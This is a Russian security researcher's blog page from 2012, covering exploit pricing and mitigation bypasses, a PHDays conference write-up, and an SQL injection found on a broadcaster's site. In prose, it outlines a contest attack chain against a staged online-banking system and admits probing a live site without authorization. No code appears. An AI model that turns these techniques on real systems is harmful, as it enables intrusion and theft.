<span style="font-family: Times, 'Times New Roman', serif;">...</span></div>
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span><br />
<br />
<div style="font-size: 15px; text-align: -webkit-auto;">
<span style="font-family: Times, 'Times New Roman', serif;">1. Increasing the amount of investment required to find dangerous vulnerabilities.</span></div>
<div style="font-size: 15px; text-align: -webkit-auto;">
<span style="font-family: Times, 'Times New Roman', serif;">2. Increasing the amount of investment required to write functional and working exploits.</span></div>
<div style="font-size: 15px; text-align: -webkit-auto;">
<span style="font-family: Times, 'Times New Roman', serif;">3. Reducing hackers' ability to recoup their investment."</span></div>
<div style="font-size: 15px; text-align: -webkit-auto;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="font-size: 15px; text-align: -webkit-auto;">
<span style="font-family: Arial, Helvetica, sans-serif; text-align: left;">(c) SecurityLab</span>
</div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">As usual, the comments are a delight 8) But let me share my own thoughts...</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Ness is actually right, and moreover, what he is talking about has been happening for the last 7-8 years. It is sad that SecLab readers do not see the difference between a "vulnerability" and an "exploit". In reality, most vulnerabilities are not worth a penny, although the cost of finding them can be real. A finished exploit, however, is worth real money. If we assume that the average price of an exploit for a popular product is around $100,000, then obviously raising the cost of developing that exploit raises its price. What makes up the price of an exploit for a browser or a browser plugin on win32 (as an example)?</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">1. Cost of finding the vulnerability V1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 1.1 Developing a fuzzer</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 1.2 Organizing fuzzing (data generation, testing)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 1.3 Reverse engineering and binary analysis</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 1.4 Source code analysis (if available)</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">2. Gaining control</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 2.1 EIP (ESP) control<br /> 2.1.1 SafeSEH bypass<br /> 2.1.2 SEHOP bypass</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 2.1.3 Bypassing /GS on the stack<br /> 2.1.4 Bypassing heap protection</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 2.2 Control over shellcode placement<br /> 2.2.1 DEP bypass (ROP/JIT Spray)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 2.2.2 Bypassing HeapSpray protections (Nozzle/Bubble)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 2.3 Transferring control<br /> 2.3.1 ASLR bypass (address leak exploit - V2 / Spray)<br />3. Arbitrary code execution<br /> 3.1 Sandbox bypass (ring0 exploit V3 / escape exploit V4)<br /><br />In 2002, items 2.1.1-2.1.4, 2.2.1-2.2.2, 2.3.1 and 3.1 did not exist. In 2007 there were no 2.1.2, 2.2.2, 2.3.1. Obviously, the complexity of exploit development keeps growing, and so do the prices! A wonderful example is Sergey Glazunov: to hack Chrome he needed <b>14</b> mini-exploits. In the simplest case you need <b>2</b> proper exploits: one for the browser or plugin plus a ring0 exploit to break out of the sandbox. This means the final price grows proportionally. Not to mention that bypassing ASLR and DEP is still often a creative task that requires extra effort. Exactly a week ago I was writing an exploit for SAP from 2008. It had /GS and DEP, and no SEH to bypass /GS with. The task was solved because GS was rather weak back then ;) Now the same exploit for SAP from 2010 cannot be written so easily, and personally I can't be bothered 8) But for SAP from 2005 it is much easier, since there is no /GS there. So the more complex the protection mechanisms become, the more expensive development will be. Well, that is kind of obvious. The final price of an exploit, however, will be determined by the following factors:<br /><br />1. Popularity of the product.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">2. Exploit stability</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">3. 0Day status. (0day is more expensive, 1day is cheaper. Yours, Captain Obvious)<br />4. Attack vector (the less the "victim" has to do for it to trigger, the better and pricier / the easier it is to deliver to the target, the pricier.)<br />5. Time from launch to triggering (the shorter, the better).<br />6. Market saturation<br /><br /><br />From this, I think the vendor cannot influence item 1 in any way 8) Item 2 - easily; all those mitigations they come up with help a little here. Item 3 - indirectly, if they hunt for bugs themselves or with the help of ZDI. For example, try to find a stack BoF in windows7? None? Right, Microsoft fuzzed and found all the simplest stuff long ago, and the would-be hackers are left to look for something less trivial =) <br />Item 4 is not obvious, but on the whole it is hard to influence without hurting the product's usability, which vendors are not willing to do. 5 - they can. And all this will lead to fewer stable and cheap exploits, while the high-quality, stable ones will cost MUCH more than now, since there will be a shortage of them on the market (item 6). How much </span><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">and in what way prices will change in such a future, I do not know 8) If the average price is now $100k, I think in 2000 it was different, I am almost sure it was 10 times lower.... What will happen in 2020? Fun times, though 8)</span></div>Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com8tag:blogger.com,1999:blog-4711612808026791519.post-25121625149781755472012-06-13T07:37:00.002-07:002012-06-13T07:37:58.517-07:00Defcon meetup DCG#7812. Number 10.<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">An anniversary meetup of our group. First, it is the 10th. Second, we are exactly ONE YEAR old. Yes, exactly a year ago we got together for the first time. Remember how it all began - </span><a href="http://devteev.blogspot.com/2011/05/defcon.html" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">http://devteev.blogspot.com/2011/05/defcon.html</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> ?</span><br />
<div style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">
<br /></div>
<div style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">
What awaits us on June 15, 2012 at SPbGPU at 19:00? Three talks and one discussion panel where everyone can speak up!<div>
<div>
<br /></div>
<div>
<span style="color: #ebebeb;"><br /></span></div>
</div>
<b>1. OAuth and what you can do with it</b> by Egor Homakov<div>
<b>2.</b> <b>OS process integrity </b>by<b> </b>Dmitry Ketov and Kirill Nesterov</div>
<div>
<b>3. Hacking VMware vCenter in 60 seconds</b> by Alexander Minozhenko and /me</div>
<div>
<br /></div>
<div>
Discussion panel: <b>Offensive Security - WTF?</b></div>
<div>
<br /></div>
<div>
A discussion panel for everyone craving conversation and an exchange of experience. Topic of the day: exploit development, exploit sales, penetration tests, amateur hacking. Where is the line between evil, good, honesty and business? Revelations and confessions! Secrets, intrigues, investigations!</div>
<div>
<br /></div>
<div>
Let's fucking rock! Oi!Oi!Oi! and so on and so forth 8)</div>
<div>
<br /></div>
<div>
P.S. Oh yes, the map, addresses and meeting points: <a href="https://defcon-russia.ru/10.php">https://defcon-russia.ru/10.php</a></div>
</div>
<br class="Apple-interchange-newline" /></div>Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com0tag:blogger.com,1999:blog-4711612808026791519.post-75482772008376178342012-06-02T14:44:00.000-07:002016-04-20T09:33:54.461-07:00PHDays. Write-up.<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal">
Since I run a blog, it would be silly not to write about my impressions of an event as high-profile as PHDays.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Before…</b></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div style="text-align: justify;">
The event promised to be legendary. Last year it was PHDays that took the first step toward "tech" and "hacking". It was a bold step and it worked. This year they promised Western speakers with interesting topics and a full two days of frenzy. Grown-up style. Well, anyone who is in one way or another into infosec simply had to try to get in. My colleagues (Sasha Polyakov aka @sh2kerr, Dmitry Evdokimov aka @evdokimovds and Sasha Minozhenko aka @al3xmin) were already in the program as speakers or as CTF participants. And I had to prepare, at the last moment (again together with Sasha Minozhenko), a talk about hacking VMware. And, oh joy, a slot was found in the FastTrack section. So one way to get to the event is to be a direct participant, a speaker, or to pass the CTF qualifiers. The second way is to be invited. As I understand it, this is the group of friends and clients of the organizing company. So it is doubly nice that they invited our colleagues too, and everyone who works in infosec. At the event I saw almost all the infosec figures I know! And that is a very important point at such events 8) Moreover, I met people I had known, for example, only through Twitter or blogs. This is a huge plus for the organizer, because the community will not forget such love and attention ;) Unfortunately, it must be admitted that everyone else, those not lucky enough to be either a direct participant in the program or an invitee, had to rely on the open registration for the remaining seats. This is the most unpleasant aspect of the whole of PHDays, but the organizers can be understood: the hall is not made of rubber, and admission is free. So the handing out of the remaining seats resembled Durov's stunt on City Day. They say there was even a denial-of-service effect from the rush of applicants. In the end all the seats were gone within 8 minutes. But it must be said that the organizers also held an additional registration, so hopefully no one was left offended. Besides, if you really want to, finding a way to "penetrate" the conference is not that hard. For example, on the first day I lost my badge and calmly walked around without it. A security guard approached only once, but took no action (a rather kind and pleasant person).</div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>During…</b></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div style="text-align: justify;">
The venue was well chosen: city center, metro nearby. The premises are good, the halls are good, the screens… well, generally good too. The sound is excellent. The organization overall was superb, in terms of technical support and convenience. Everywhere there are places to sit and things to look at. Your eyes are always busy with something. That's cool. The overall style is kept quite well, actually just excellently 8) The organizers themselves looked exhausted, but always helped and never left you in trouble. This is simply outstanding, so I want to say to all those positive guys whom I pestered with all sorts of problems: THANK YOU!</div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Talks…</b></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
There are many tracks, they run in parallel, and you had to choose where to go. But the choice was not difficult, since there were not that many technical and interesting talks 8( But those that were there were first-class 8) I'll note:</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Travis Goodspeed</b> – a talk about using noise and injecting packets at layer one! Fun, original and interesting. The speaker conveys the topic well; I did slightly miss the idea behind generating the noise, but later that part was explained to me too 8)</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Nikita Tarakanov</b> and <b>Alexander Bazhanyuk</b> – using BitBlaze in fuzzing. A good, technical talk, and most importantly a very objective one regarding what the subject can actually do. It is a great pity that Sasha himself could not come to Moscow, for objective reasons; I would have really liked to talk in person.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Marcus Niemietz</b> – tapjacking. Yes, it is an amusing talk, and most importantly it shows how to bypass things like "restrictions on calls and app launches" through user interface bugs. We'll see, of course, whether attackers will actually implement such attacks, but from the standpoint of Android's overall security model it is a clear fail.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Aleksandr Matrosov</b> and <b>Eugene Rodionov</b> – a very curious overview talk on attacks against smart card interfaces by real-world malware. I believe this is exactly what talks from antivirus people should be like. For instance, all three talks from Kaspersky were dull from a technical standpoint, generic and scaremongering. Although I am sure they could have presented something hellish too, apparently the target audience was different… yes, yes, for "suits", and there were a lot of such talks for kids or suits 8(</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Andrei Costin</b> – a well-known hacker who breaks what any pentester often ignores during engagements: printers. A really interesting and spectacular talk.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Vladimir Vorontsov</b> – about XXE attacks and how to read a valid XML document. Well presented, he even showed a 0-day 8) and the main value of the talk is its practical applicability in real life, for example in those same pentests. I love such talks, and so, despite it being at 9 a.m. on the second day, we came to it with aching heads and short on sleep… and there were no seats left in the hall 8) That's cool!</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
By the way, Volodya later carried out a "talk injection attack" and, unplanned, told the fast track section about a peculiarity of the new RFC, namely that now, according to the new religion of the standard, all subdomains can read the cookies of the higher-level domain. I would even call this talk "breaking news" 8)</div>
<div class="MsoNormal">
<br /></div>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;">In addition, <b>Vladimir Kochetkov</b>'s talk was technical and good, and really interesting. There were also other interesting talks from<b> Sergey Shcherbel</b>, <b>Miroslav Stampar</b>, <b>Dmitry Sklyarov</b> and <b>Andrey Belenko</b>, <b>Fyodor Yarochkin</b> and <b>Vladimir Kropotov</b>, <b>Alexander Lyamin</b> (by the way, Alexander later said that there is a more interesting topic, about taking down nginx, and offered it to us for Zeronights. I asked for the details, but Alexander, good for him, did not give up the 0-day and only told me about a slowloris-like thing, but we hope this talk will still take place at ZN).</span></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPokt-5JTJbLN4nyV-1-CMaXzd8DQ0PsS2NB5BFQQYktO28bDEaNq0NH6WG-hAUUepOgJrAnfXJabVGeHYZPGsv1CtwqVXzEXVCq3yWgMWhsVSHYQd94T7cem5jfMxnvgnQ9dce1AAEGut/s1600/PHD_RANDOM.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPokt-5JTJbLN4nyV-1-CMaXzd8DQ0PsS2NB5BFQQYktO28bDEaNq0NH6WG-hAUUepOgJrAnfXJabVGeHYZPGsv1CtwqVXzEXVCq3yWgMWhsVSHYQd94T7cem5jfMxnvgnQ9dce1AAEGut/s640/PHD_RANDOM.JPG" width="640" /></a></div>
<pre style="background: white;"><i style="background-color: white; font-family: 'Times New Roman', serif; font-size: 12pt;">Dmitry Sklyarov shows how some developers choose an algorithm for generating random numbers 8)</i></pre>
<div style="background: white; text-align: left;">
<span style="font-family: "times new roman" , serif; font-size: 12pt;">And what about Schneier? No, I can't say anything bad about his talk. But I will say something good: he speaks smoothly and is interesting to listen to. In general, I got the impression that what people wanted most was simply to have their photo taken with him 8) And what about Solar Designer? The talk may have been "historical", but he is an interesting and very smart person; it's a pity I didn't really get to talk to him.<br />Unfortunately, the fast track was not in a hall but right in the passageway. So it was hard for those who spoke quietly and modestly. In general, the fast track went somewhat boringly. I hope I wasn't talking too much nonsense there; I wasn't feeling great (wind, alcohol, lack of sleep… well, I'm sort of making excuses).</span></div>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"><b>Master classes…</b></span></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<div style="background: white; text-align: left;">
<span style="font-family: "times new roman" , serif; font-size: 12pt;">They say they were dull and for "noobs". I was at only one, about HTML5. Yes, it is general, of course, but not dull. Everything is prepared at a good level: tests, tasks, demonstrations. Everything is neat and effective for learning. So thanks to <b>Andrés Riancho</b> (@w3af). Great work!<br />Now a couple of unpleasant points: the rest of the talks were awfully "suit-like" or dull. This is not how hackers hack Moscow ). That is my personal opinion. Maybe I am a bore and nitpicking. Forgive me for that. Also, on the second day clearly fewer people came than on the first.<br />You will read about the freebies, food, beer and single malt whisky in other write-ups, and next I will tell you about the contests.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBRMiWpIyFTLrU9oTqf8Y0TOuRmNcqFQtaspSKNhEtSEEvCUnRIah5f39JPcXKylXI87NBOSRXONM_TBbTAP4P6MliOlJHBk-0M-kexIzkvw1zBi1ZsEIl9sFlDw6bR6hrhx0sdGqEFoBq/s1600/PHD_BOAT.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBRMiWpIyFTLrU9oTqf8Y0TOuRmNcqFQtaspSKNhEtSEEvCUnRIah5f39JPcXKylXI87NBOSRXONM_TBbTAP4P6MliOlJHBk-0M-kexIzkvw1zBi1ZsEIl9sFlDw6bR6hrhx0sdGqEFoBq/s640/PHD_BOAT.JPG" width="640" /></a></div>
<pre style="background: white;"><i style="background-color: white; font-family: 'Times New Roman', serif; font-size: 12pt;">Fyodor Yarochkin, Alexander Polyakov and I met on a boat. Just like in Amsterdam in 2010, when we also went for a boat ride… (nostalgia)</i></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"><b>Contests.</b></span></pre>
<div style="text-align: justify;">
<span style="background-color: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;">One of the distinctive features of PHDays is its CTF. I am not a participant in this festival of hacking, but I can say that it is rare for CTF participants to be given such attention and love. Of course, making people play two days in a row and all night may be merciless, but this is for true hackers with strong nerves, stamina and perseverance. In short, not for me 8) But I am very glad that our team LeetMore won there. First, it is a team from St. Petersburg; second, my colleague @al3xmin plays there; third, there are many cool and smart guys there. And no wonder, since the Dragon Book is classic reading for them.
I, on the other hand, have not read it and regard this gap as my personal shortcoming as a specialist 8) (<i>todo: buy and read</i>).<br />Besides the CTF there were many other contests, but I will single out one, in which we took part. Rather, I declined to participate, saying that I had come here to socialize and not to sit in front of a laptop (which I also had not brought), but my colleagues Dima @_chipik and Gleb @cherboff accepted the challenge. The contest is "Big Ku$h". The day before the action, registered participants received an OS image with a deployed remote banking (DBO) system and a test database. In addition, of course, the source code of this remote banking system was provided. After you have spent a day hunting for bugs, the contest takes place on the second day: every participant is given their own login and password for the remote banking system and a card (a real one!) linked to their account. About 30 minutes are given. During this time the participants must hack the live remote banking installation; the task is to transfer money from other accounts to their own, and then use the issued card to withdraw REAL cash from an ATM, which was also real and stood off to the side waiting for the winners.
As I understand it, the organizers put together their own pseudo-processing and hooked it up to the remote banking DBMS and to the ATM. A very cool solution and a very lively contest. After all, the dough could be swiped not only from the prepared accounts but also from other participants. The account balances were displayed on a screen, and for the whole 30 minutes you could watch the process unfold and see who was the cooler thief 8) A very lively contest, and whoever came up with it is a genius. The vulnerabilities themselves were not just dumb web bugs but also logic flaws. Our exploit enumerated the IDs of the remote banking users, reset their passwords through the corresponding bug (skipping one step), logged into their accounts, fetched the balance and transferred all the dough to our account. For this the one-time password had to be bypassed, which was also done thanks to the weak generation algorithm for that very code. To automate this whole process a bug was found in the captcha, so in the end the exploit did everything itself: full automation. The operator only watched 8) In addition, the fact that we could get owned too was taken into account, so our exploit not only stole but also protected us: it changed the password and reset the session periodically. As a result, our guys took second place, beating such renowned hackers as CYBERPUNK and Raz0r, so I am very proud of them. Unfortunately, they did not bother with the other bugs in this contest: weak session generation and an authentication bypass in the Helpdesk.
These bugs gave information about accounts with numeric passwords (which then allowed brute-forcing them) and, as a consequence, access to accounts with a different balance. If I got something wrong, I hope someone will correct me... So the hero of the contest was GiftS, who exploited these weaknesses, took first place and <s>stole </s>earned 3500 rubles, while my friends got only second place and 900 rubles 8) The ATM honestly paid out all the money. Third place went to Raz0r. I hope the guys will tell what else there was in this contest! But really, the contest was a success... I had a lot of fun rooting for the guys, watching the cool-headed faces of the participants and the scoreboard with the balance table!</span></span></div>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihgzBnaiMj_om36ONZqdCHU0DpuXvOlgnSfvnL3VdpZwhOcuiHUOBxftmr23Do-DzckZWS7qplyahRu28cd9w-rZaOVfGR96AC3TG1u_XxTzMLRjoIuzm7m8zcPXceshKnoQLFLy7zgKd6/s1600/PHD_DBO.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihgzBnaiMj_om36ONZqdCHU0DpuXvOlgnSfvnL3VdpZwhOcuiHUOBxftmr23Do-DzckZWS7qplyahRu28cd9w-rZaOVfGR96AC3TG1u_XxTzMLRjoIuzm7m8zcPXceshKnoQLFLy7zgKd6/s640/PHD_DBO.JPG" width="640" /></a></div>
<pre style="background: white;"><i><span style="font-family: "times new roman" , serif; font-size: 12pt;">Participants of the "Big Ku$h" contest</span></i></pre>
<div style="background: white; text-align: left;">
<span style="font-family: "times new roman" , serif; font-size: 12pt;">Ah yes, I also won in the T-shirt contest (in the script-kiddies contest):<br /> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQA8kUlQXOGUaIj6yU-NhCJpKLreqxIWMbYJX6lfc3ycaqwcbfUOYNkNLZ0RZQalRWiRhY1omndH4O_EMWPxNuXoBA9vxrZqGDpL5Z77B7mVfEZf7ZVEa0iH6CNFksCmltw8TO2k_5vvMH/s1600/PHDAYSXSS.jpg" imageanchor="1" style="background-color: transparent; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQA8kUlQXOGUaIj6yU-NhCJpKLreqxIWMbYJX6lfc3ycaqwcbfUOYNkNLZ0RZQalRWiRhY1omndH4O_EMWPxNuXoBA9vxrZqGDpL5Z77B7mVfEZf7ZVEa0iH6CNFksCmltw8TO2k_5vvMH/s400/PHDAYSXSS.jpg" width="400" /></a></div>
<pre style="background: white; text-align: left;"><span style="font-family: "times new roman" , serif; font-size: medium;">
</span></pre>
<div style="background: white; text-align: left;">
<span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">And of course the </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">HACK</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">2</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">OWN contest. It</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">ended with two successful break-ins: Nikita Tarakanov demonstrated a privilege escalation in </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">Windows</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">XP</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">, and the second winner, Pavel Shuvalov, achieved, it seems, code execution via </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">SMS</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">on the </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">iPhone</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">.<o:p></o:p></span></div>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-UR9ksY-VFj-pLOAxEx2VMjVlbxmCjkOROpAfiOToLZE9hHDgG7Cjg8nUJ1Ckja6UZrY7ShblKdNRqke6cMsmv-vht-TDiurb1oWMybdSu8Eos6f_8o-VV2_UGMHfEMGaefocsYVfKA6z/s1600/PHD_0DAY.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-UR9ksY-VFj-pLOAxEx2VMjVlbxmCjkOROpAfiOToLZE9hHDgG7Cjg8nUJ1Ckja6UZrY7ShblKdNRqke6cMsmv-vht-TDiurb1oWMybdSu8Eos6f_8o-VV2_UGMHfEMGaefocsYVfKA6z/s640/PHD_0DAY.JPG" width="640" /></a></div>
<pre style="background: white;"><i style="background-color: white;"><span style="font-family: "times new roman" , serif; font-size: medium;">Nikita Tarakanov, two-time prize winner 8)</span></i></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: medium;">
</span></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglQ2sn97_qNvpka1weRWmBFmYBlxND9GiZ0NrpCDImXrb4kNrzLha1W-YNJnIuADBp26Cppo4F2cp3VxiqMZqJRT_vO_88Myhr_Qd1VD8eRaPwrVxaSHwFzS5YgXT3fxyGbM04JIUmjXxo/s1600/PHD_TUSA.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="425" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglQ2sn97_qNvpka1weRWmBFmYBlxND9GiZ0NrpCDImXrb4kNrzLha1W-YNJnIuADBp26Cppo4F2cp3VxiqMZqJRT_vO_88Myhr_Qd1VD8eRaPwrVxaSHwFzS5YgXT3fxyGbM04JIUmjXxo/s640/PHD_TUSA.JPG" width="640" /></a></div>
<pre style="background: white;"><i style="background-color: white; font-family: 'Times New Roman', serif; font-size: 12pt;">Artur Gerkis, Andrey Kostin, Fyodor Yarochkin, me, Alexander Polyakov and Dmitry Evdokimov.</i></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtK2lObeffxVQjkeCRYc3d1BjBbJ5KyXthBnsjIZV9sUf8ohmNvWiFEhT9r93ILmiWr3PRMkrIT-3jAx8zLAB6-gOOUeYRN2bzSFqw9-CzK51ygzGtPJ00DRE7MIoMCYSGN652JnhjQTiS/s1600/PHD_TEAM.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtK2lObeffxVQjkeCRYc3d1BjBbJ5KyXthBnsjIZV9sUf8ohmNvWiFEhT9r93ILmiWr3PRMkrIT-3jAx8zLAB6-gOOUeYRN2bzSFqw9-CzK51ygzGtPJ00DRE7MIoMCYSGN652JnhjQTiS/s640/PHD_TEAM.JPG" width="640" /></a></div>
<pre style="background: white;"><i style="background-color: white; font-family: 'Times New Roman', serif; font-size: 12pt;">Alexander Matrosov, me, Artur Gerkis, Vladimir Vorontsov (winner of the alco-hack contest «Nalivayka», by the way), Alexander Polyakov 8)</i></pre>
<pre style="background: white;"><i style="background-color: white; font-family: 'Times New Roman', serif; font-size: 12pt;">
</i></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: medium;">//Photos by Artur Gerkis and Vladimir Kropotov</span></pre>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com7tag:blogger.com,1999:blog-4711612808026791519.post-31118464577841221962012-05-29T20:38:00.002-07:002012-05-29T20:38:28.284-07:00A press release in the infosec industry as a red rag to script-kiddies.<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Press releases in the infosec field are a delicate subject. Here is an example:<br />
<br />
http://www.securitylab.ru/news/425086.php<br />
<br />
The goals of such a thing are clear:<br />
<br />
VGTRK: "we protect our users and care about their security".<br />
The others: "we deliver cool services and save VGTRK's users".<br />
<br />
But on the other hand, I went to the vgtrk.com site and, just for fun, spent exactly 2 seconds playing with the parameters of this resource, like any decent script-kiddie. An SQL injection popped up right away. I did not even look any further (and naturally I did not break or steal anything, I am a law-abiding citizen). As a user, I do not care who does what there, or who sells and deploys what for what money. In reality, the security of VGTRK's main external resource is absent. Simple and dirty. And it was precisely the press release that caught my attention; otherwise I would never have gone there. Others, by the way, picked up the initiative:<br />
<br />
"@/*__CENSORED__*/:<br />there is something scary in there %) 40 databases under Oracle, 412 users of those databases..."<br />
<br />
No, I understand that all those infosec processes are not the same as putting a quote into a request: they are complex, expensive work, projects and contracts 8) I am not a fan of conspiracy or kickback theories, but this is simply funny, and above all it subconsciously lowers trust in everyone involved in this project.<br />
<br />
An additional fact: the thing that was deployed at VGTRK finds problems such as SQLi perfectly well. And that only raises more questions 8))<br />
<br />
P.S. This post should be taken not as a call to hacktivism but as a call to assess one of the problems of the domestic infosec field...<br />
<br /></div>Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com4tag:blogger.com,1999:blog-4711612808026791519.post-60029842072936232852012-05-21T06:01:00.001-07:002012-05-21T06:53:45.378-07:00Yandex.Mail. Preventing a hackastrophe<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">In November of last year, Yandex held a </span><a href="http://habrahabr.ru/company/yandex/blog/131199/" id="bxid_528269" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">contest </a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">to find vulnerabilities in its service. I was lucky enough to find a couple of holes there and take second place for it. Since in these six months I still have not published the details (except at a </span><a href="https://defcon-russia.ru/" id="bxid_813562" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Defcon-Russia</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> meetup, but that was in spoken form for a narrow circle of attendees), I decided to fill that gap now. So here is the story of one of the holes that was discovered during the contest and promptly closed by Yandex. I think the contest fully justified itself and made it possible to prevent terrible consequences, so the idea was clearly a success, nothing but pluses. The story itself is about a banal missing authorization check in one of the scripts, which could have led to the partial compromise of more than a billion messages on just a single node…</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><br /></span><br />
